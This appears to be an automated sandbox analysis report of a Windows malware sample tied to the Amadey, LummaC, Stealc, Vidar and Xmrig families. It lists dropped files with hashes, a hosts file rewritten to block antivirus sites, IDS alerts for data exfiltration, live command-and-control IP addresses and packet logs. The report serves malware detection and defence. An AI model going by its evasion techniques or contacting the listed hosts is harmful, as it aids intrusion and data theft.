                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                              • 162.230.48.189
                                              https://astonishing-maize-sunstone.glitch.me/Get hashmaliciousUnknownBrowse
                                              • 13.32.27.44

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Windows\Temp\lwouyklykeoh.sysfile.exeGet hashmaliciousXmrigBrowse
                                                ICBM.exeGet hashmaliciousXmrigBrowse
                                                  ICBM.exeGet hashmaliciousXmrigBrowse
                                                    ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                                                      file.exeGet hashmaliciousXmrigBrowse
                                                        ICBM.exeGet hashmaliciousXmrigBrowse
                                                          ICBM.exeGet hashmaliciousXmrigBrowse
                                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                                              ICBM.exeGet hashmaliciousXmrigBrowse
                                                                HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                                                  C:\ProgramData\Google\Chrome\updater.exefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse

                                                                    Created / dropped Files

                                                                    C:\ProgramData\Google\Chrome\updater.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5511680
                                                                    Entropy (8bit):6.550874483171553
                                                                    Encrypted:false
                                                                    SSDEEP:98304:Ri+ISLkAwC4YIVupdG/3tSKqetQBNzeSBPMjSZQVG2aHlyu+NsehhNreacvHGK4B:RkkIVuI3tSytQrzpMWZ66wNreacPGKK
                                                                    MD5:73A56908097EE57DD4217877AEAE4641
                                                                    SHA1:A41CC3570F40F9688B2AC9F5E7326150A3A350A6
                                                                    SHA-256:FDE56E00761A85AD495BD2D05654F3657922F665F58EDFABCF43D2FA769F0D79
                                                                    SHA-512:930BA7D57F250B5C9E020C0265DB9376D0675BFCAFB7C5C5E292ADD319EC2942A9F2B5286F997E406E7F1EFFB8E1029649A5141CD7AD032F4B75A77E51259C67
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                                    Joe Sandbox View:
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....)g.........."......"....R.....@..........@..............................T...........`..................................................v..<.....T......`T...............T.x............................@..(....D..8............w..x............................text....!.......".................. ..`.rdata...=...@...>...&..............@..@.data...h.R.......R..d..............@....pdata.......`T.......T.............@..@.00cfg.......pT.......T.............@..@.tls..........T.......T.............@....rsrc.........T.......T.............@..@.reloc..x.....T.......T.............@..B........................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1940658735648508
                                                                    Encrypted:false
                                                                    SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                    MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                    SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                    SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                    SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                    Malicious:false
                                                                    Preview:@...e................................. ..............@..........

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzv5kr52.ld5.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_om3frud2.0a5.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wh30ep40.nj2.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcm5q2dz.i0w.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................

                                                                    C:\Windows\System32\drivers\etc\hosts

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):2748
                                                                    Entropy (8bit):4.269302338623222
                                                                    Encrypted:false
                                                                    SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                                    MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                                    SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                                    SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                                    SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                                    Malicious:true
                                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

                                                                    C:\Windows\Temp\__PSScriptPolicyTest_1jmsi3d4.uxf.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Windows\Temp\__PSScriptPolicyTest_mffyjs5v.l3d.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Windows\Temp\__PSScriptPolicyTest_te3mujdo.yaj.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Windows\Temp\__PSScriptPolicyTest_zi0dymbs.0t5.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Windows\Temp\lwouyklykeoh.sys

                                                                    Download File
                                                                    Process:C:\ProgramData\Google\Chrome\updater.exe
                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):14544
                                                                    Entropy (8bit):6.2660301556221185
                                                                    Encrypted:false
                                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                    Joe Sandbox View:
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: ICBM.exe, Detection: malicious, Browse
                                                                    • Filename: ICBM.exe, Detection: malicious, Browse
                                                                    • Filename: ahlntQUj2t.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: ICBM.exe, Detection: malicious, Browse
                                                                    • Filename: ICBM.exe, Detection: malicious, Browse
                                                                    • Filename: ICBM.exe, Detection: malicious, Browse
                                                                    • Filename: ICBM.exe, Detection: malicious, Browse
                                                                    • Filename: HmA7s2gaa5.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.550874483171553
                                                                    TrID:
                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:file.exe
                                                                    File size:5'511'680 bytes
                                                                    MD5:73a56908097ee57dd4217877aeae4641
                                                                    SHA1:a41cc3570f40f9688b2ac9f5e7326150a3a350a6
                                                                    SHA256:fde56e00761a85ad495bd2d05654f3657922f665f58edfabcf43d2fa769f0d79
                                                                    SHA512:930ba7d57f250b5c9e020c0265db9376d0675bfcafb7c5c5e292add319ec2942a9f2b5286f997e406e7f1effb8e1029649a5141cd7ad032f4b75a77e51259c67
                                                                    SSDEEP:98304:Ri+ISLkAwC4YIVupdG/3tSKqetQBNzeSBPMjSZQVG2aHlyu+NsehhNreacvHGK4B:RkkIVuI3tSytQrzpMWZ66wNreacPGKK
                                                                    TLSH:CA4612651BC103AEF2E040794F3505F3501A66A18D1B0BABD2F56E57EBB2DE7C021CEA
                                                                    File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....)g.........."......"....R.....@..........@..............................T...........`........................................

                                                                    File Icon

                                                                    Icon Hash:00928e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x140001140
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x140000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6729CCCF [Tue Nov 5 07:44:15 2024 UTC]
                                                                    TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b237ac2118704db9e7609540658f5790

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    dec eax
                                                                    mov eax, dword ptr [00012ED5h]
                                                                    mov dword ptr [eax], 00000001h
                                                                    call 00007F2B208476FFh
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    dec eax
                                                                    add esp, 28h
                                                                    ret
                                                                    nop
                                                                    inc ecx
                                                                    push edi
                                                                    inc ecx
                                                                    push esi
                                                                    push esi
                                                                    push edi
                                                                    push ebx
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec eax
                                                                    mov eax, dword ptr [00000030h]
                                                                    dec eax
                                                                    mov edi, dword ptr [eax+08h]
                                                                    dec eax
                                                                    mov esi, dword ptr [00012EC9h]
                                                                    xor eax, eax
                                                                    dec eax
                                                                    cmpxchg dword ptr [esi], edi
                                                                    sete bl
                                                                    je 00007F2B20847720h
                                                                    dec eax
                                                                    cmp edi, eax
                                                                    je 00007F2B2084771Bh
                                                                    dec esp
                                                                    mov esi, dword ptr [00016779h]
                                                                    nop word ptr [eax+eax+00000000h]
                                                                    mov ecx, 000003E8h
                                                                    inc ecx
                                                                    call esi
                                                                    xor eax, eax
                                                                    dec eax
                                                                    cmpxchg dword ptr [esi], edi
                                                                    sete bl
                                                                    je 00007F2B208476F7h
                                                                    dec eax
                                                                    cmp edi, eax
                                                                    jne 00007F2B208476D9h
                                                                    dec eax
                                                                    mov edi, dword ptr [00012E90h]
                                                                    mov eax, dword ptr [edi]
                                                                    cmp eax, 01h
                                                                    jne 00007F2B208476FEh
                                                                    mov ecx, 0000001Fh
                                                                    call 00007F2B20859474h
                                                                    jmp 00007F2B20847719h
                                                                    cmp dword ptr [edi], 00000000h
                                                                    je 00007F2B208476FBh
                                                                    mov byte ptr [005417D1h], 00000001h
                                                                    jmp 00007F2B2084770Bh
                                                                    mov dword ptr [edi], 00000001h
                                                                    dec eax
                                                                    mov ecx, dword ptr [00012E7Ah]
                                                                    dec eax
                                                                    mov edx, dword ptr [00012E7Bh]
                                                                    call 00007F2B2085946Bh
                                                                    mov eax, dword ptr [edi]
                                                                    cmp eax, 01h
                                                                    jne 00007F2B2084770Bh
                                                                    dec eax
                                                                    mov ecx, dword ptr [00012E50h]

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x176080x3c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5490000x390.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5460000x198.pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000x78.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x140a00x28.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x144100x138.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x177c00x178.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x121160x122001509289b251ce927850ce27f89ece8baFalse0.45307112068965516data6.186061855046194IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x140000x3dfc0x3e0067b011c23b7e5c8a4355c1eee092ccb3False0.5104586693548387data5.136352755110268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x180000x52d7680x52aa00c229dead7ce3676099ffc9aaa6beeb38unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .pdata0x5460000x1980x200a284cbcfa1d13c11a0dffabcca064100False0.52734375data3.6332552680991546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .00cfg0x5470000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .tls0x5480000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x5490000x3900x4000dd02af6ec781894019ac3fdb5cbf63fFalse0.384765625data2.998554535660332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x54a0000x780x200a39919fdf7b33c1123ed7bed1fd77ddeFalse0.23828125data1.4899261113070796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0x5490600x32cdataEnglishUnited States0.4396551724137931

                                                                    Imports

                                                                    DLLImport
                                                                    msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strcat, strcpy, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                                    KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-11-05T12:24:36.141321+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.949768162.230.48.18980TCP
                                                                    2024-11-05T12:24:41.243644+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.949794TCP
                                                                    2024-11-05T12:25:18.678723+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.949976TCP
                                                                    2024-11-05T12:25:35.977063+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.949984162.230.48.18980TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 5, 2024 12:24:34.070075989 CET4976220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:34.076821089 CET2012849762149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:34.076917887 CET4976220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:34.077220917 CET4976220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:34.083956003 CET2012849762149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:34.908329964 CET2012849762149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:34.908540964 CET2012849762149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:34.909116983 CET4976220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:34.909334898 CET4976220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:34.914134979 CET2012849762149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:35.047694921 CET4976880192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:24:35.052784920 CET8049768162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:24:35.052894115 CET4976880192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:24:35.054439068 CET4976880192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:24:35.059851885 CET8049768162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:24:35.059917927 CET4976880192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:24:35.064879894 CET8049768162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:24:35.152173042 CET2012849762149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:35.207972050 CET4976220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:36.140078068 CET8049768162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:24:36.141320944 CET4976880192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:24:36.146995068 CET8049768162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:24:36.147110939 CET4976880192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:24:36.166831017 CET4976220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:36.172334909 CET2012849762149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:36.172441959 CET4976220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:41.207806110 CET4980620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:41.212610960 CET2012849806149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:41.212687969 CET4980620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:41.221492052 CET4980620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:41.227061033 CET2012849806149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:42.051192999 CET2012849806149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:42.051533937 CET2012849806149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:42.051661968 CET4980620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:42.052108049 CET4980620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:42.056991100 CET2012849806149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:42.296961069 CET2012849806149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:42.297184944 CET4980620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:42.302700996 CET2012849806149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:42.302774906 CET4980620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:48.254704952 CET4984220128192.168.2.9149.102.143.109
